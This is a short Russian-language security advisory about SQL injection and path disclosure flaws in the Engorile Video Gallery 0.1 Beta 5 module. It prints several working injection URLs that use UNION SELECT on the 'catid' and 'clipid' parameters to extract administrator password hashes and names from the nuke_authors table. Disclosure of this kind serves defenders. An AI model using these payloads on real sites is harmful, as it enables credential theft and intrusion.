Программа: Engorile Video Gallery 0.1 Beta 5
Несколько уязвимостей обнаружено в Engorile Video Gallery. Удаленный пользователь может внедрить SQL команды, которые будут выполнены на основной базе данных. Удаленный пользователь может также определить инсталляционный путь.
Программа не достаточно проверяет правильность данных, представленных пользователем в параметрах 'catid' и 'clipid':
http://[target]/modules.php?name=Video_Gallery&l_ op=viewclip&clipid=-1%20UNION%20SELECT%
20pwd%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_ op=viewcat&catid=-1%20UNION%20SELECT%
20pwd%20FROM%20nuke_authors
http://[target]/modules.php?name=Video_Gallery&l_ op=viewclip&clipid=-1%20UNION%20SELECT%
20name%20FROM%20nuke_authors&catid=1
http://[target]/modules.php?name=Video_Gallery&l_ op=voteclip&clipid=-1%20UNION%20SELECT%20
pwd%20FROM%20nuke_authors&catid=1
Также удаленный пользователь может определить инсталляционный путь:
http://[target]/modules.php?name=Video_Gallery&l_ op=viewcat&catid=darkbicho
http://[target]/modules.php?name=Video_Gallery&l_ op=viewclip&clipid=darkbicho&catid=1
